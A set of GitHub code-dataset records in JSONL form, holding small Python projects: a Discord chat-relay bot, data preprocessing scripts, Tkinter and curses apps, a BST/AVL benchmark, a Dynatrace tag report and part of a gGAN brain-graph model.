discord.Embed(color=constants.Colors.BLUE, description='You\\'re no longer talking to people in **{}**'.format(chat_grabber.destination.guild))\n await self.client.message_create(chat_grabber.origin, embed=embed)\n embed = discord.Embed(color=constants.Colors.BLUE, description='You\\'re no longer talking to people in **{}**'.format(chat_grabber.origin.guild))\n await self.client.message_create(chat_grabber.destination, embed=embed)\n\n async def create_chat(self, message):\n if any(message.channel in (c.origin, c.destination) for c in self.chat_grabbers):\n await self.client.message_create(message.channel, 'This channel is already chatting.')\n return\n try:\n chat_grabber = next(c for c in self.chat_grabbers if not c.started)\n chat_grabber.set_destination(message.channel)\n await chat_grabber.start()\n except StopIteration:\n embed = discord.Embed(color=constants.Colors.BLUE, description='**Looking for someone who wants to talk to you**')\n await self.client.message_create(message.channel, content=message.author.mention, embed=embed)\n chat_grabber = utils.ChatGrabber(\n self.client, \n message.channel, \n timeout=30,\n start_hook=self.send_start_message,\n stop_hook=self.send_stop_message,\n destination_to_origin=True\n )\n self.chat_grabbers.append(chat_grabber)\n backend.future_or_timeout(chat_grabber.destination_future, 30)\n try:\n await chat_grabber.destination_future\n except TimeoutError:\n embed = discord.Embed(color=constants.Colors.RED, description=':x: **No one wants to talk to you**')\n await self.client.message_create(message.channel, content=message.author.mention, embed=embed)\n self.chat_grabbers.remove(chat_grabber)\n return\n\n async def close_chat(self, message):\n try:\n chat_grabber = next(c for c in self.chat_grabbers if message.channel in (c.origin, c.destination))\n except StopIteration:\n await self.client.message_create(message.channel, 'This channel isn\\'t chatting')\n return\n if message.author in chat_grabber.cancellation_votes:\n await self.client.message_create(message.channel, 'You\\'ve already voted to close this chat.')\n return\n users = list(filter((lambda key: time() - chat_grabber.users[key]['time'] < 30), chat_grabber.users))\n if message.author.id not in users:\n return\n elif len(chat_grabber.cancellation_votes) >= len(users) - 1:\n await chat_grabber.stop()\n self.chat_grabbers.remove(chat_grabber)\n else:\n chat_grabber.cancellation_votes.append(message.author)\n await self.client.message_create(message.channel, '{}/{} votes required to close this chat.'.format(chat_grabber.cancellation_votes, len(users)))\n\n @extension.command\n async def chat(self, client, message, arg=None):\n if arg is None:\n await self.create_chat(message)\n elif arg.lower() == 'close':\n await self.close_chat(message)\n","repo_name":"Tortoise-Community/hata-code-jam","sub_path":"team-cinnamon/bot/extensions/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14059288406","text":"import json\n\nimport requests\nfrom random import random, randrange, choice, randint\nfrom string import ascii_letters\n\nimport Sale\nfrom Product import State, Supplier\nfrom Sale import Payment\n\nsuppliers = ['pla', 'sud', 'riv', 'vyr', None]\nlocalhost = 'http://127.0.0.1:8000/'\n\n\ndef random_string():\n string = ''\n for a in range(randrange(3, 40)):\n string += choice(ascii_letters + ' ')\n return string\n\n\ndef random_products(qty=1):\n items = []\n for i in range(qty):\n item = {'title': random_string(), 'state': choice(list(State)), 'price': randrange(1000, 15000, 50)}\n if item['state'] == 'new':\n item['supplier'] = choice(list(Supplier))\n items.append(item)\n return items\n\n\ndef random_sales(qty=1):\n sales = []\n for i in range(qty):\n sale = {'products': random_products(randint(1, 8)), 'client_id': randint(1000000, 45000000),\n 'payment_method': choice(list(Payment)), 'email': 'whatever@whatever.com'}\n sales.append(sale)\n return sales\n\n\ndef post_sales(sales: list[Sale.Sale], url=localhost):\n results = []\n for i in sales:\n r = requests.post(url + 'new_sale/', json.dumps(i))\n results.append(r)\n return results\n\n\n","repo_name":"messina8/FacturApi","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13850331801","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# CSS class defining a thread.\nTHREAD_CLASS = \"topic\" # type: str\n\n# CSS class defining a title inside a thread.\nTITLE_CLASS = \"bbp-topic-permalink\" # type: str\n\n# Path to the csv file listing all thread titles using Korean characters.\nEXISTING_KOREAN_THREADS = \"/FULL/PATH/HERE\"\n\n# Path to a local HTML file for tests.\nTEST_HTML_FILE = \"/FULL/PATH/HERE\"\n\n# Path to the log file.\nLOGFILE = \"/FULL/PATH/HERE\"\n","repo_name":"saintsaens/fl-bb-stalker","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28906417920","text":"import argparse\nimport os\nimport pickle\n\nimport pandas as pd\nfrom sklearn.feature_extraction import DictVectorizer\n\n\ndef read_dataframe(filename: str):\n df = pd.read_parquet(filename)\n\n df['duration'] = df.lpep_dropoff_datetime - df.lpep_pickup_datetime\n df.duration = df.duration.apply(lambda td: td.td.total_seconds() / 60)\n df = df[(df.duration >= 1) & (df.duration <= 68)]\n\n categorical = ['PULocationID', 'DOLocationID']\n df[categorical] = df[categorical].astype(str)\n\n return df\n\n\n\ndef dump_pickle(obj, filename):\n with open(filename, \"wb\") as fp:\n return pickle.dump(obj, fp)\n\n\n\ndef preprocess(df: pd.DataFrame, dv: DictVectorizer, fit_dv: bool=False):\n df['PU_DO'] = df['PULocationID'] + '_' + df['DOLocationID']\n categorical = ['PU_DO']\n numerical = ['trip_distance']\n dicts = df[categorical + numerical].to_dict(orient='records')\n\n if fit_dv:\n X = dv.fit_transform(dicts)\n else:\n X = dv.transform(dicts)\n\n return X, dv\n\n\ndef run(raw_data_path: str, dest_path: str, dataset: str=\"green\"):\n df_train = read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2022-01.parquet\"))\n\n df_valid = read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2022-02.parquet\"))\n\n df_test = read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2022-03.parquet\"))\n\n target = 'duration'\n y_train = df_train[target].values\n y_valid = df_train[target].values\n y_test = df_train[target].values\n\n dv = DictVectorizer()\n X_train, dv = preprocess(df_train, dv, fit_dv=True)\n X_valid, _ = preprocess(df_valid, dv, fit_dv=False)\n X_test, _ = preprocess(df_test, dv, fit_dv=False)\n\n os.makedirs(dest_path, exist_ok=True)\n\n dump_pickle(dv, os.path.join(dest_path, \"dv.pkl\"))\n dump_pickle((X_train, y_train), os.path.join(dest_path, \"train.pkl\"))\n dump_pickle((X_valid, y_valid), os.path.join(dest_path, \"valid.pkl\"))\n dump_pickle((X_test, y_test), os.path.join(dest_path, \"test.pkl\"))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--raw_data_path\",\n help=\"Location of your raw data which is either in .parquet format\"\n )\n\n parser.add_argument(\n \"--dest_path\",\n help=\"where you want to save your processed data.\"\n )\n\n args = parser.parse_args()\n\n run(args.raw_data_path, args.dest_path)","repo_name":"alokpadhi/NYC-Trip-Duration","sub_path":"src/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35981088142","text":"import openpyxl\n\npath = \"C:\\Prashanti M\\data1.xlsx\"\nworkbook=openpyxl.load_workbook(path)\n#sheet = workbook.get_sheet_by_name(\"Sheet1\")\nsheet = workbook.active\nrows=sheet.max_row\ncols=sheet.max_column\n\nprint(rows)\nprint(cols)\n\nfor r in range(1,rows+1): #range consider end-1 so we increment\n for c in range(1,cols+1):\n print(sheet.cell(row=r,column=c).value)","repo_name":"Prashanti770/selepract2","sub_path":"selepract1-main/ReadExcel.py","file_name":"ReadExcel.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72481699272","text":"# Dictionary\r\n\r\ndaily_temps_dict = {'sun':71.1, 'mon':71.5, 'tues':80.2, 'wed':79.2, 'thur':75.6, 'fri':75.2, 'sat':81.4}\r\n\r\nprint(\"This program displays the avg temperature for a given day\")\r\n\r\nterminate = False\r\nwhile not terminate:\r\n\r\n day = input(\"Enter 'sun', 'mon', 'tues', 'wed', 'thur', 'fri', or 'sat': \")\r\n\r\n if day in daily_temps_dict:\r\n print(\"The temperature for {} is {}\".format(day, daily_temps_dict[day]))\r\n else:\r\n print(\"Invalid input\")\r\n\r\n t = input(\"Do you want to continue? (y/n) \")\r\n if t in 'Nn':\r\n terminate = True\r\n","repo_name":"bjf5201/python-snippets","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11337323033","text":"#!/usr/bin/env python3\n# # -*- coding: UTF-8 -*-\"\n# ------------------------------------------------\n# Creation Date: 11-02-2017\n# Last Change: ter 29 nov 2016 09:21:52 BRT\n# this script aims: show files and dirs recursively\n# author: sergio luiz araujo silva\n# site: http://vivaotux.blogspot.com\n# twitter: @voyeg3r\n# ------------------------------------------------\n# Obs: to rename files we have to use --> topdown=False\n\n\nimport os\n\n\nsearch_folder = '.'\n\nfor root, dirs, files in os.walk(search_folder):\n print(f'Diretório: {root}')\n for file in files:\n fullfilepath = os.path.join(root, file)\n filesize = os.path.getsize(fullfilepath)\n print(f'{fullfilepath} bites: {filesize}')\n print()\n","repo_name":"voyeg3r/dotfiles","sub_path":"bin/showtree.py","file_name":"showtree.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"5865013095","text":"import urllib.parse\nfrom itertools import groupby\n\nfrom Reuse import dynatrace_api\nfrom Reuse import environment\nfrom Reuse import report_writer\n\n\ndef get_tag_data(env, token):\n endpoint = '/api/config/v1/autoTags'\n raw_params = 'fields=+description'\n params = urllib.parse.quote(raw_params, safe='/,&=')\n auto_tags_json_list = dynatrace_api.get(env, token, endpoint, params)\n\n tag_data_list = []\n\n for auto_tags_json in auto_tags_json_list:\n inner_auto_tags_json_list = auto_tags_json.get('values')\n for inner_auto_tags_json in inner_auto_tags_json_list:\n name = inner_auto_tags_json.get('name')\n description = inner_auto_tags_json.get('description', '')\n tag_data_list.append((name, description))\n\n return tag_data_list\n\n\ndef process(env_name_list, all_env_name_data):\n rows = []\n\n for key in sorted(all_env_name_data.keys()):\n autotag_data = all_env_name_data.get(key)\n autotag_name = key\n autotag_env_name_list = autotag_data.get('env_name_list')\n autotag_description_list = autotag_data.get('description_list')\n if all_equal(autotag_description_list):\n autotag_description = autotag_description_list[0]\n else:\n autotag_description = str(autotag_description_list)\n finding = ''\n if autotag_env_name_list != env_name_list or not all_equal(autotag_description_list):\n if autotag_env_name_list != env_name_list:\n finding = 'Not defined in all environments'\n else:\n finding = 'Not defined identically in all environments'\n\n rows.append((autotag_name, autotag_description, report_writer.stringify_list(autotag_env_name_list), finding))\n\n report_name = 'Auto Tag Summary'\n report_writer.initialize_text_file(None)\n report_headers = ('Auto Tag Name', 'Description', 'Environments', 'Finding')\n report_writer.write_console(report_name, report_headers, rows, delimiter='|')\n report_writer.write_text(None, report_name, report_headers, rows, delimiter='|')\n report_writer.write_xlsx(None, report_name, report_headers, rows, header_format=None, auto_filter=None)\n report_writer.write_html(None, report_name, report_headers, rows)\n\n\ndef add_or_update(env_name, env_name_data, all_env_name_data):\n env_name_data_current = all_env_name_data.get(env_name_data[0])\n if env_name_data_current:\n env_name_list = env_name_data_current.get('env_name_list')\n description_list = env_name_data_current.get('description_list')\n env_name_list.append(env_name)\n description_list.append(env_name_data[1])\n all_env_name_data[env_name_data[0]] = {'env_name_list': env_name_list, 'description_list': description_list}\n else:\n all_env_name_data[env_name_data[0]] = {'env_name_list': [env_name], 'description_list': [env_name_data[1]]}\n\n\ndef all_equal(iterable):\n g = groupby(iterable)\n return next(g, True) and not next(g, False)\n\n\ndef main():\n env_name_list = ['Prod', 'NonProd']\n\n all_env_name_data = {}\n\n for env_name in env_name_list:\n env_name, env, token = environment.get_environment(env_name)\n env_name_data_list = get_tag_data(env, token)\n for env_name_data in env_name_data_list:\n add_or_update(env_name, env_name_data, all_env_name_data)\n\n process(env_name_list, all_env_name_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Dynatrace-Dave-Mauney/Automation","sub_path":"Reporting/Tags/report_autotag_summary.py","file_name":"report_autotag_summary.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"4204882106","text":"# Implement dynamic arrays, similar to Java's ArrayList. By default, python\n# lists are dynamic arrays, so just try to simulate static arrays in python\n\nclass DynamicArray:\n \n CAPACITY_INC_SIZE = 2\n \n def __init__(self, size):\n self.dynamic_array = [None] * size\n self.index = 0\n\n def append(self, item):\n if self.dynamic_array[-1] != None:\n self.inc_size_and_copy_array()\n\n self.dynamic_array[self.index] = item\n self.index += 1\n\n def get(self, index):\n if index <= self.index - 1:\n return self.dynamic_array[index]\n else:\n return 'Error: index doesn''t exist'\n\n def len(self):\n return self.index\n\n def size(self):\n return len(self.dynamic_array)\n\n def inc_size_and_copy_array(self):\n temp = [None] * (len(self.dynamic_array) * self.CAPACITY_INC_SIZE)\n for idx, item in enumerate(self.dynamic_array):\n temp[idx] = item\n self.dynamic_array = temp \n\n def __str__(self):\n return \" \".join(str(self.dynamic_array[:self.index]))\n\nda = DynamicArray(2)\nda.append(10)\nda.append(20)\nda.append(30)\nprint(da)\nprint('Array Length: ', da.len())\nprint('Array Size:', da.size())\nda.append(40)\nda.append(50)\nprint('Array Length: ', da.len())\nprint('Array Size: ', da.size())\nprint(da)\nprint(da.get(0))\nprint(da.get(9))\nprint(da.get(4))","repo_name":"mkvenkatesh/Random-Programming-Exercises","sub_path":"dynamic_array_implementation.py","file_name":"dynamic_array_implementation.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7680862442","text":"import curses\nimport random\nimport gspread\nfrom inventoryManager import *\nfrom mapManager import *\nfrom actionManager import *\nfrom skillManager import *\nfrom screenManager import *\nfrom questManager import *\nfrom statManager import *\nfrom helpManager import *\nfrom debugManager import *\n\n#test\n\ndef main(screen):\n curses.start_color()\n curses.use_default_colors()\n for i in range(0, curses.COLORS):\n curses.init_pair(i + 1, i, -1)\n curses.curs_set(0)\n screen.nodelay(True)\n screen.clear()\n screenSizeY, screenSizeX = screen.getmaxyx()\n mapSizeX = 300\n mapSizeY = 300\n inventoryPosY = mapSizeY + int(mapSizeY/10)\n descriptionBoxX = mapSizeX + int(mapSizeX/10)\n skillManagerDisplayX = descriptionBoxX\n skillManagerDisplayY = inventoryPosY\n playerPosX = int(mapSizeX/2)\n playerPosY = int(mapSizeY/2)\n ax = 0\n ay = 0\n currentMap, monsters, towns = mapGenerate(mapSizeX, mapSizeY)\n modulePositions = ['map','actions','inventory','skills', 'quests', 'stats', 'help', 'debug']\n inventory = ['axe', 'shovel', 'bucket']\n skills = {}\n prayerPoints = 0\n playerMoveDirection = ('x','y')\n #quest tuple is (,,,,)\n activeQuests = []\n shop = {'logs':2}\n actionDescriptions = {'grass':((\"Press 'p' to plant seed\"), 16), \n 'tree':((\"Press 'c' to chop down tree\"), 3),\n 'town':((\"Press 'e' to enter town\"), 14), \n 'shop':((\"Press 's' to enter shop\"), 15),\n 'monster':((\"Press 'a' to attack monster\"), 5), \n 'water':((\"Press 'f' to fish the water\"), 2),\n 'fire':((\"Press 'f' to start fire\"), 13), \n 'mountain':((\"Press 'e' to explore mountain\"), 16),\n 'mine':((\"Press 'm' to mine ore\"), 7), \n 'craftShop':((\"Press 'c' to enter shop\"), 4),\n 'quest':((\"Press 'e' to complete quest\"), 15), \n 'alter':((\"Press 'p' to pray\"), 2),\n }\n # Stats are in order, health, mana, attack, defense, speed, left wield, right wield, head, neck, torso, left arm, right arm, legs, feet, pet\n playerStats = [100, 100, 100, 100, 10, 1, 1, 11, 1, 12, 1, 1, 35, 14, 20]\n textToDisplay = [(\"Test\",13),(\"another test!\",5)]\n armourUpdated = True\n\n while True:\n keyPressed = keyboardManager(screen)\n screen.clear()\n screenBorders(screen)\n helpManagerDisplay(screen, modulePositions.index('help'))\n mapDraw(screen, currentMap, playerPosX, playerPosY, mapSizeX, mapSizeY, modulePositions.index('map'))\n skillManagerDisplay(screen, skills, modulePositions.index('skills'))\n inventoryManager(inventory, screen, inventoryPosY, modulePositions.index('inventory'))\n questManagerDisplay(screen, activeQuests, modulePositions.index('quests'))\n statManagerDisplay(screen, modulePositions.index('stats'), playerStats, armourUpdated)\n actionManagerDisplay(screen, modulePositions.index('actions'), textToDisplay, currentMap, mapSizeX, mapSizeY, playerPosX, playerPosY, monsters)\n currentMap, inventory, skills, activeQuests, modulePositions, textToDisplay, prayerPoints, playerMoveDirection = actionManagerKey(currentMap, playerPosX, playerPosY, inventory, skills, screen, activeQuests, modulePositions, textToDisplay, prayerPoints, keyPressed)\n if not playerMoveDirection[0] == 'x' and not playerMoveDirection[1] == 'y':\n playerPosX, playerPosY = playerMovementManager(currentMap, playerPosX, playerPosY, playerMoveDirection)\n currentMap = mapEvents(currentMap, playerPosX, playerPosY, monsters)\n\n armourUpdated = False\n #debugManagerDisplay(screen, modulePositions.index('debug'))\n\n\nif __name__ == '__main__':\n screenSetup()\n curses.wrapper(main)\n","repo_name":"LachlanB96/rogueLike","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"11493838099","text":"from tkinter import *\n\nMILE_TO_KM= 1.609\n\ndef miles_to_km():\n '''Display te miles in km'''\n _miles = float(miles.get())\n _km = _miles * MILE_TO_KM\n converted_label.config(text=round(_km,2))\n\n#400 x 250 pixel window \nwindow = Tk()\nwindow.title(\"Miles to Km Converter\")\nwindow.minsize(300, 120)\nwindow.config(padx=20, pady=20)\n\n#Static labels\nlabel = Label(text=\"is equal to\", font=(\"Arial\", 12, \"bold\"))\nlabel.grid(column=0, row=1)\nlabel.config(padx=10)\n\nmiles_label = Label(text=\"Miles\", font=(\"Arial\", 12, \"bold\"))\nmiles_label.grid(column=2, row=0)\nmiles_label.config(padx=10)\n\nkm_lablel = Label(text=\"Km\", font=(\"Arial\", 12, \"bold\"))\nkm_lablel.config(padx=10)\nkm_lablel.grid(column=2, row=1)\n\n#Miles entry box\nmiles = Entry(width=10)\nmiles.grid(column=1, row=0)\n\n#Dinamic convert label\nconverted_label = Label(text=\"0\", font=(\"Arial\", 12, \"bold\"))\nconverted_label.grid(column=1,row=1)\n\n#Calculate button\nconvert_button = Button(text=\"Calculate\", font=(\"Arial\", 12, \"bold\"),command=miles_to_km)\nconvert_button.grid(column=1, row=2)\n\nwindow.mainloop()","repo_name":"alvarohqr/My-100-Days-of-Code-Python","sub_path":"Day 27/miles_to_km.py","file_name":"miles_to_km.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16745175211","text":"from BST_tree import BinarySearchTree\nfrom AVL_tree import AVL_tree\nimport time\nimport random\nimport cProfile\n\ndef run_profiler():\n N = 10000000\n\n data_bst = random.sample(range(1, 10000001), N)\n data_avl = data_bst.copy()\n\n bst = BinarySearchTree()\n avl = AVL_tree()\n\n #inserts\n start_time = time.time()\n\n for data in data_bst:\n bst.insert(data)\n bst_insert_time = time.time() - start_time\n print(\"BST nodes: \", bst.count_nodes())\n\n start_time = time.time()\n\n for data in data_avl:\n avl.insert(data)\n avl_insert_time = time.time() - start_time\n print(\"AVL nodes: \", avl.count_nodes())\n\n #search\n\n search_numbers = random.sample(range(1, N+1), 1000)\n\n start_time = time.time()\n\n for number in search_numbers:\n bst.search(number)\n bst_search_time = time.time() - start_time\n\n start_time = time.time()\n\n for number in search_numbers:\n avl.search(number)\n avl_search_time = time.time() - start_time\n\n print(\"BST insert time: \", bst_insert_time)\n print(\"AVL insert time: \", avl_insert_time)\n print(\"BST search time: \", bst_search_time)\n print(\"AVL search time: \", avl_search_time)\n\ncProfile.run('run_profiler()', sort='tottime')","repo_name":"Christ02/parcial_2","sub_path":"2) BST vs AVL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"754615656","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 12 14:11:48 2018\r\nThe program is based on https://github.com/nfmcclure/tensorflow_cookbook\r\n\"\"\"\r\n\r\nfrom tensorflow.python.framework import ops\r\nops.reset_default_graph()\r\n\r\n# Housing Price Data\r\nfrom keras.datasets import boston_housing\r\n(x_train, y_train), (x_test, y_test) = boston_housing.load_data()\r\nhousing_header = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV']\r\nprint(x_train.shape[0])\r\nprint(x_train.shape[1])\r\n","repo_name":"JunzuoWan/DeepLearning_MachineLearning","sub_path":"Collecting_Data_HousingPriceDataset.py","file_name":"Collecting_Data_HousingPriceDataset.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71604800072","text":"\"\"\"Main function of gGAN for the paper: Foreseeing Brain Graph Evolution Over Time\r\nUsing Deep Adversarial Network Normalizer\r\n Details can be found in: (there will be a paper link here)\r\n (1) the original paper .\r\n ---------------------------------------------------------------------\r\n This file contains the implementation of two key steps of our gGAN framework:\r\n netNorm(v, nbr_of_sub, nbr_of_regions)\r\n Inputs:\r\n v: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n Output:\r\n CBT: (t x t) matrix representing the connectional brain template\r\n\r\n gGAN(sourceGraph, nbr_of_regions, nbr_of_folds, nbr_of_epochs, hyper_param1, CBT)\r\n Inputs:\r\n sourceGraph: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n CBT: (t x t) matrix stacking the connectional brain template generated by netNorm\r\n\r\n Output:\r\n translatedGraph: (t x t) matrix stacking the graph translated into CBT\r\n\r\n (2) Dependencies: please install the following libraries:\r\n - matplotlib\r\n - numpy\r\n - scikitlearn\r\n - pytorch\r\n - pytorch-geometric\r\n - pytorch-scatter\r\n - pytorch-sparse\r\n - scipy\r\n\r\n ---------------------------------------------------------------------\r\n Copyright 2020 ().\r\n Please cite the above paper if you use this code.\r\n All rights reserved.\r\n \"\"\"\r\n\r\n\r\n# If you are using Google Colab please uncomment the three following lines.\r\n# !pip install torch_geometric\r\n# !pip install torch-sparse==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n# !pip install torch-scatter==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n\r\n\r\nimport argparse\r\nimport pickle\r\nimport os\r\nimport pdb\r\nimport numpy as np\r\nimport math\r\nimport itertools\r\nimport torch\r\nfrom torch.nn import Sequential, Linear, ReLU, Sigmoid, Tanh, Dropout\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom torch_geometric.data import Data\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch_geometric.nn import NNConv, GCNConv\r\nfrom torch_geometric.nn import BatchNorm, EdgePooling, TopKPooling, global_add_pool\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.stats as stats\r\nimport seaborn as sns\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda')\r\n print('running on GPU')\r\n # if you are using GPU\r\n torch.cuda.manual_seed(0)\r\n torch.cuda.manual_seed_all(0)\r\n\r\n torch.backends.cudnn.enabled = False\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n print('running on CPU')\r\n\r\nnbr_of_regions = 35\r\n\r\n\r\ndef set_num_regions(num_regions):\r\n global nbr_of_regions\r\n nbr_of_regions = num_regions\r\n\r\n\r\ndef netNorm(v, nbr_of_sub):\r\n nbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\n\r\n def upper_triangular():\r\n All_subj = np.zeros((nbr_of_sub, nbr_of_feat))\r\n for j in range(nbr_of_sub):\r\n subj_x = v[j, :, :]\r\n subj_x = np.reshape(subj_x, (nbr_of_regions, nbr_of_regions))\r\n subj_x = subj_x[np.triu_indices(nbr_of_regions, k=1)]\r\n subj_x = np.reshape(subj_x, (1, nbr_of_feat))\r\n All_subj[j, :] = subj_x\r\n\r\n return All_subj\r\n\r\n def distances_inter(All_subj):\r\n theta = 0\r\n distance_vector = np.zeros(1)\r\n distance_vector_final = np.zeros(1)\r\n x = All_subj\r\n for i in range(nbr_of_feat):\r\n ROI_i = x[:, i]\r\n for j in range(nbr_of_sub):\r\n subj_j = ROI_i[j:j + 1]\r\n\r\n distance_euclidienne_sub_j_sub_k = 0\r\n for k in range(nbr_of_sub):\r\n if k != j:\r\n subj_k = ROI_i[k:k + 1]\r\n\r\n distance_euclidienne_sub_j_sub_k = distance_euclidienne_sub_j_sub_k + np.square(\r\n subj_k - subj_j)\r\n theta += 1\r\n if j == 0:\r\n distance_vector = np.sqrt(distance_euclidienne_sub_j_sub_k)\r\n else:\r\n distance_vector = np.concatenate((distance_vector, np.sqrt(distance_euclidienne_sub_j_sub_k)),\r\n axis=0)\r\n\r\n distance_vector = np.reshape(distance_vector, (nbr_of_sub, 1))\r\n if i == 0:\r\n distance_vector_final = distance_vector\r\n else:\r\n distance_vector_final = np.concatenate((distance_vector_final, distance_vector), axis=1)\r\n\r\n print(theta)\r\n return distance_vector_final\r\n\r\n def minimum_distances(distance_vector_final):\r\n x = distance_vector_final\r\n\r\n for i in range(nbr_of_feat):\r\n minimum_sub = x[0, i:i + 1]\r\n minimum_sub = float(minimum_sub)\r\n general_minimum = 0\r\n general_minimum = np.array(general_minimum)\r\n for k in range(1, nbr_of_sub):\r\n local_sub = x[k:k + 1, i:i + 1]\r\n local_sub = float(local_sub)\r\n if local_sub < minimum_sub:\r\n general_minimum = k\r\n general_minimum = np.array(general_minimum)\r\n minimum_sub = local_sub\r\n if i == 0:\r\n final_general_minimum = np.array(general_minimum)\r\n else:\r\n final_general_minimum = np.vstack((final_general_minimum, general_minimum))\r\n\r\n final_general_minimum = np.transpose(final_general_minimum)\r\n\r\n return final_general_minimum\r\n\r\n def new_tensor(final_general_minimum, All_subj):\r\n y = All_subj\r\n x = final_general_minimum\r\n for i in range(nbr_of_feat):\r\n optimal_subj = x[:, i:i + 1]\r\n optimal_subj = np.reshape(optimal_subj, (1))\r\n optimal_subj = int(optimal_subj)\r\n if i == 0:\r\n final_new_tensor = y[optimal_subj: optimal_subj + 1, i:i + 1]\r\n else:\r\n final_new_tensor = np.concatenate((final_new_tensor, y[optimal_subj: optimal_subj + 1, i:i + 1]),\r\n axis=1)\r\n\r\n return final_new_tensor\r\n\r\n def make_sym_matrix(nbr_of_regions, feature_vector):\r\n my_matrix = np.zeros([nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n\r\n my_matrix[np.triu_indices(nbr_of_regions, k=1)] = feature_vector\r\n my_matrix = my_matrix + my_matrix.T\r\n my_matrix[np.diag_indices(nbr_of_regions)] = 0\r\n\r\n return my_matrix\r\n\r\n def re_make_tensor(final_new_tensor, nbr_of_regions):\r\n x = final_new_tensor\r\n # x = np.reshape(x, (nbr_of_views, nbr_of_feat))\r\n\r\n x = make_sym_matrix(nbr_of_regions, x)\r\n x = np.reshape(x, (1, nbr_of_regions, nbr_of_regions))\r\n\r\n return x\r\n\r\n Upp_trig = upper_triangular()\r\n Dis_int = distances_inter(Upp_trig)\r\n Min_dis = minimum_distances(Dis_int)\r\n New_ten = new_tensor(Min_dis, Upp_trig)\r\n Re_ten = re_make_tensor(New_ten, nbr_of_regions)\r\n Re_ten = np.reshape(Re_ten, (nbr_of_regions, nbr_of_regions))\r\n np.fill_diagonal(Re_ten, 0)\r\n network = np.array(Re_ten)\r\n return network\r\n\r\ndef cast_data(array_of_tensors, version):\r\n version1 = torch.tensor(version, dtype=torch.int)\r\n\r\n N_ROI = array_of_tensors[0].shape[0]\r\n CHANNELS = 1\r\n dataset = []\r\n edge_index = torch.zeros(2, N_ROI * N_ROI)\r\n edge_attr = torch.zeros(N_ROI * N_ROI, CHANNELS)\r\n x = torch.zeros((N_ROI, N_ROI)) # 35 x 35\r\n y = torch.zeros((1,))\r\n\r\n counter = 0\r\n for i in range(N_ROI):\r\n for j in range(N_ROI):\r\n edge_index[:, counter] = torch.tensor([i, j])\r\n counter += 1\r\n for mat in array_of_tensors: # 1,35,35,4\r\n\r\n if version1 == 0:\r\n edge_attr = mat.view((nbr_of_regions * nbr_of_regions), 1)\r\n x = mat.view(nbr_of_regions, nbr_of_regions)\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n elif version1 == 1:\r\n edge_attr = torch.randn(N_ROI * N_ROI, CHANNELS)\r\n x = torch.randn(N_ROI, N_ROI) # 35 x 35\r\n edge_index 